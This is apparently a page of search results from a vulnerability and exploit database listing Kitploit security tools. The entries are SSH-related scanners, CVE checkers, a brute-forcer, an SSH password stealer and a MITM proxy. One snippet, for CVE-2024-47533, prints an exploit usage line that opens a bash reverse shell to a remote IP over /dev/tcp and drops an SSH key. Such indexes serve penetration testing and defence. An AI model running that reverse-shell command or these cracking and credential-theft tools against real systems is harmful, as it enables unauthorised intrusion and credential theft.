Lucene search
+L

16155 matches found

Kitploit
Kitploit
added 2026/09/04 5:12 a.m.55 views

totp-ssh-fluxer

TOTP SSH port fluxing Some people change their SSH port on their servers so that it is slightly harder to find for bots or other nasties, and while that is generally viewed as an action of security through obscurity it does work very well at killing a lot of the automated logins you always see in...

5.8AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/04 5:00 a.m.145 views

psc

PortShellCrypter -- PSC This project - as well as its sister project crash - belongs to my anti-censorship tool-set that allows to setup fully working encrypted shells and TCP/UDP forwarding in hostile censoring environments. It is also useful for forensics to dump data from devices via UART or...

5.9AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/04 4:53 a.m.19 views

driftwood

Driftwood ⚠️ The Driftwood CLI tool is no longer supported. Please use TruffleHog instead! ⚠️ Driftwood is a tool that can enable you to lookup whether a private key is used for things like TLS or as a GitHub SSH key for a user. Driftwood performs lookups with the computed public key, so the...

5.6AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/04 4:45 a.m.5 views

dsa

A Summary of Go's crypto/dsa Vulnerability CVE-2016-3959 Alex Mullins April 9, 2016 Introduction Recently, there was a bug discovered in the Digital Signature Algorithm DSA crypto library for the Go programming language. In this article we'll go over the details of the bug and how an attacker cou...

7.5CVSS6.7AI score0.04419EPSS
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 4:42 a.m.4 views

CVE-2026-54686-poc

CVE-2026-54686: Warp DCS Lifecycle Hook Spoofing PoC 日本語版はこちら Description This repository contains a safe local Proof of Concept for CVE-2026-54686 , based on Warp's public advisory GHSA-9w2v-jhww-vm85. Before the patched release, Warp accepted certain state-mutating DCS lifecycle hooks from the...

4.3CVSS5.8AI score0.00404EPSS
SaveExploits1References2
Kitploit
Kitploit
added 2026/09/04 4:32 a.m.3 views

Shreder

Shreder Shreder is a powerful multi-threaded SSH protocol password brute-force tool. Features Very fast password guessing, just one password in 0.1 second. Optimized for big password lists, Shreder tries 1000 passwords in 1 minute and 40 seconds. Simple CLI and API usage. Installation...

5.9AI score
SaveExploits0References4
Kitploit
Kitploit
added 2026/09/04 4:16 a.m.4 views

OpenSSH-Vulnerability-test

OpenSSH CVE-2024-6387 Vulnerability Checker Overview This C program scans specified IP addresses or network ranges to check if the servers are running a potentially vulnerable version of OpenSSH. It checks if the SSH port default is 22 is open, retrieves the SSH banner, and determines if the serv...

8.1CVSS6.9AI score0.99506EPSS
SaveExploits71References1
Kitploit
Kitploit
added 2026/09/04 4:10 a.m.3 views

CVE_2023_20198_Detector

CVE202320198Detector This script can identify if Cisco IOS XE devices are vulnerable to CVE-2023-20198. The script takes as input a csv file with all the device IP addresses that you want to check. By default the script looks for a file named "devices.csv"; you can name the file something differe...

10CVSS7AI score0.99571EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/04 4:06 a.m.3 views

Beleth

Beleth Dictionary based SSH cracker root@kitploit: Usage: ./beleth OPTIONS -c payload Execute payload on remote server once logged in -h Display this help -l threads Limit threads to given number. Default: 4 -p port Specify remote port -P password Use single password attempt -t target Attempt...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 4:05 a.m.30 views

ssh-mitm

SSH MITM v2.3-dev Author: Joe Testa @therealjoetesta Overview This penetration testing tool allows an auditor to intercept SSH connections. A patch applied to the OpenSSH v7.5p1 source code causes it to act as a proxy between the victim and their intended SSH server; all plaintext passwords and...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 3:49 a.m.4 views

sshLooter

DON'T USE THIS There's a C version which is much better sshLooterC sshLooter Script to steal passwords from ssh. Install root@kitploit: git clone https://github.com/mthbernardes/sshLooter.git cd sshLooter Configuration root@kitploit: Edit the script on install.sh, and add your telegram bot api, a...

5.9AI score
SaveExploits0References2
Kitploit
Kitploit
added 2026/09/04 3:48 a.m.3 views

sshroute

sshroute...

5.9AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 3:45 a.m.2 views

CVE-2024-6387-Checker

CVE-2024-6387-Checker Description CVE-2024-6387-Checker is a tool designed to identify servers running vulnerable versions of OpenSSH, specifically targeting the recently discovered regreSSHion vulnerability CVE-2024-6387. This script facilitates rapid scanning of multiple IP addresses, domain...

8.1CVSS6.9AI score0.99506EPSS
SaveExploits71
Kitploit
Kitploit
added 2026/09/04 3:44 a.m.31 views

algo

Algo VPN Algo VPN is a set of Ansible scripts that simplify the setup of a personal WireGuard and IPsec VPN. It uses the most secure defaults available and works with common cloud providers. See our release announcement for more information. Features Supports only IKEv2 with strong crypto AES-GCM...

5.7AI score
SaveExploits0References29
Kitploit
Kitploit
added 2026/09/04 3:41 a.m.4 views

trommel

TROMMEL TROMMEL sifts through embedded device files to identify potential vulnerable indicators. TROMMEL identifies the following indicators related to: Secure Shell SSH key files Secure Socket Layer SSL key files Internet Protocol IP addresses Uniform Resource Locator URL email addresses shell...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/04 3:32 a.m.5 views

CVE-2024-47533

root@kitploit: Reverse shell python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'bash -c "bash -i & /dev/tcp/10.10.14.23/4444 0&1"' Simple command python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd 'id' Drop SSH key python3 CVE-2024-47533.py --url http://127.0.0.1:25151 --cmd...

9.8CVSS7.2AI score0.04003EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/04 3:30 a.m.42 views

wotop

Web-On-Top-Of-Protocol WOTOP root@kitploit: ██╗ ██╗ ██████╗ ████████╗ ██████╗ ██████╗ ██║ ██║██╔═══██╗╚══██╔══╝██╔═══██╗██╔══██╗ ██║ █╗ ██║██║ ██║ ██║ ██║ ██║██████╔╝ ██║███╗██║██║ ██║ ██║ ██║ ██║██╔═══╝ ╚███╔███╔╝╚██████╔╝ ██║ ╚██████╔╝██║ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═════╝ ╚═╝ Introduction WOTOP is a...

6.2AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/04 3:22 a.m.5 views

pentest_teamcity

Pentest TeamCity using Metasploit TL;DR: Obtain passwords fromJetBrains IDE like IntelliJ or PyCharm and use those credentials inside TeamCity Continuous Integration Server in order to get meterpreter session on server and build agents using metasploit by Kacper Szurek. JetBrains Comment This is ...

6.1AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/04 3:20 a.m.5 views

Puwr

Contents About Puwr Puwr Usage Port scanning Showcases Disclaimer Future Puwr Easily expand your attack surface on a local network by discovering more hosts, via SSH. Using a machine running a SSH service, Puwr uses a given subnet range to scope out IP's, sending back any successful ping requests...

5.9AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/04 3:18 a.m.3 views

Deadguez

Deadguez Deadguez is a fast SSH scanner Dependencies sshpass Demo Tested on Operating System| Version ---|--- Linux Mint| 19.3 Tricia Contact Twitter: @4wsec License GNU General Public License v3.0 Copyright Deadguez is made with ❤️ by Arya Narotama - 2020...

5.9AI score
SaveExploits0References1
Rows per page
Query Builder